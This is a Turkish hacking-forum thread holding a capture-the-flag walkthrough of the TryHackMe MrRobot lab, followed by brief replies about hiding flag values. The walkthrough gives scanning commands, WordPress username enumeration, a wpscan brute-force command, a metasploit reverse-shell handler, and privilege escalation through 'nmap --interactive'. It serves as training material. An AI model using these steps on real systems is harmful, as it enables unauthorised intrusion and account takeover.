TryHackMe MrRobot Çözümü / Cold-Shadow

Cold-Shadow

Kıdemli Üye
8 Şub 2015
3,423
1
26
Merhaba dostlar bugün sizlerle TryHackMe sitesinin bize sunduğu MrRobot adlı makineyi çözeceğiz.

İlgili makineye gitmek için: https://tryhackme.com/room/mrrobot

Öncelikle "nmap" taraması yapıp hangi portların açık olduğuna bakalım.


Kod:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-30 20:41 +03
Nmap scan report for http://10.10.93.8/
Host is up (0.16s latency).
Not shown: 997 filtered ports
PORT    STATE  SERVICE
22/tcp  closed ssh
80/tcp  open   http
443/tcp open   https

Nmap done: 1 IP address (1 host up) scanned in 12.04 seconds
Nmap çıktımız bu şekilde. 80 portu açık görünüyor. Bakalım hemen neler varmış



Ekranda görünenleri deneyip bişey elde edemedik.

Daha sonra "Gobuster" aracı ile dizinleri tarıyoruz. Bakalım neler elde edebileceğiz.



Kod:
gobuster dir -u http://10.10.93.8/ -w /use/share/dirb/wordlists/small.txt

"login" i görüp adrese gidiyoruz.



Göründüğü gibi WordPress kurulu. Hemen "WpScan" aracı ile tarıyorum.



Robots.txt dosyası olduğunu görüyorum ve bakıyorum.

BİNGO!!
İlk Flag'imizi böyle bulmuş oluyoruz.


CAIFD1.jpg


Aynı zamanda "fsocity.dic" adlı dosyayı indiriyorum

Daha sonra "wp-login.php" adresinde bir kaç deneme yapıyorum ve "ERROR: Invalid username." hatasını alıyorum. Daha sonra dizi ve baş rolümüz aklıma geliyor. "*****" kullanıcı adını deniyorum.

Bu sefer aldığım hata değişiyor ve karşıma "
ERROR: The password you entered for the username ***** is incorrect." hatası çıkıyor. Kullanıcı adımızı bulduk. Peki şifre? indirdiğimiz "fsocity" dosyasına baktığım zaman "bunlar şifre olabilir" diyorum. Ama 800.000 küsür satırdan oluşuyor dosya. Bir birini tekrar eden şeyler olabileceğini düşünüp kısaltıyorum ve "password.txt" olarak kaydediyorum.
Kod:
 sort -u fsocity.dic > password.txt

Yine aşağıdaki komutla uzunluğuna baktığımda "11451" satıra düştüğünü görüyorum

Kod:
wc -l password.txt
Ve yine "WpScan" aracıyla "Brute Force" yapıyorum.
Şifre karşımıza çıkıyor.
CATuGp.jpg

Kod:
wpscan --url http://10.10.93.8/wp-login.php --passwords /root/TryHackME/MrRobot/password.txt --usernames *****
Ve Daha sonra "msfvenom" ile shell oluşturuyorum.


Daha sonra "msfconsole" (m-e-t-a-sploit) aracımı kullanıp gerekli ayarları yaptıktan sonra login olduğum WordPress sistemine shellimi upload ediyorum. Msfconsole aracımdan payloadı çalıştırıyorum.


Kod:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 10.9.43.118
ser lport 4444
run
Daha sonra "home/robot" klasörü içinde flag'ımı görüyorum ancak erişimim yok.
Ancak farklı bir kullanıcı adı ve MD5 görüyorum.
MD5'i online sitelerde decrytp ediyorum ve şifreyi çözüyorum.


Kod:
abcdefghijklmnopqrstuvwxyz
Kullanıcı adı:robot
Şifre:abcdefghijklmnopqrstuvwxyz
robot kullanıcısına geçmek istediğimde hata alıyorum ve biraz araştırdıktan sonra interactive shell'e çevirerek root olabileceğimi görüyorum.

Ve şu komutu çalıştırıyorum


Kod:
[I]import pty; pty.spawn("/bin/sh")[/I]
Ve BİNGO!
Daha sonra "nmap --interactive" diyip "root" klasörü içindeki son flag'imi okuyorum.

Kod:
 nmap --interactive
Okuduğunuz için teşekkürler, umarım yararlı olabilmişimdir.



Not: Sonlarda makinenin süresini uzatmayı unuttuğum için makineyi tekrar başlattığımda ip adresi değişti.

 
Moderatör tarafında düzenlendi:

P4RS

Özel Üye
8 Ocak 2017
5,156
58
Ankara
Ellerine sağlık fakat keşke flag değerlerini kapatsaydınız böylelikle writeup kısmına link olarak ekleyebilirdiniz. Birde yazının rengini farklı bir tonda yapar mısınız?
 

Cold-Shadow

Kıdemli Üye
8 Şub 2015
3,423
1
26
Ellerin dert görmesin
Teşekkür ederim PourLa :)
Ellerine sağlık fakat keşke flag değerlerini kapatsaydınız böylelikle writeup kısmına link olarak ekleyebilirdiniz. Birde yazının rengini farklı bir tonda yapar mısınız?
Teşekkür ederim P4RS :) DarkRed'den Red'e aldım :)
Ancak link olarak ekleme kısmını anlayamadım kusura bakma, kafam çok dolu :)
 

P4RS

Özel Üye
8 Ocak 2017
5,156
58
Ankara
Teşekkür ederim PourLa :)

Teşekkür ederim P4RS :) DarkRed'den Red'e aldım :)
Ancak link olarak ekleme kısmını anlayamadım kusura bakma, kafam çok dolu :)

Tryhackme de makinenin üstünde Writeups kısmı var. Oraya tıkladığında makineyi çözen kişilerin writeup'ları var. Oraya kendi yaptığınız bir sitedeki writeup'ı ekleyebiliyorsunuz. Onu kast ettim :))
 

Cold-Shadow

Kıdemli Üye
8 Şub 2015
3,423
1
26
Tryhackme de makinenin üstünde Writeups kısmı var. Oraya tıkladığında makineyi çözen kişilerin writeup'ları var. Oraya kendi yaptığınız bir sitedeki writeup'ı ekleyebiliyorsunuz. Onu kast ettim :))

Tamamdır :) Yarın o zaman konuyu biraz daha düzenleyebilirsem düzenler eklerim :)
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.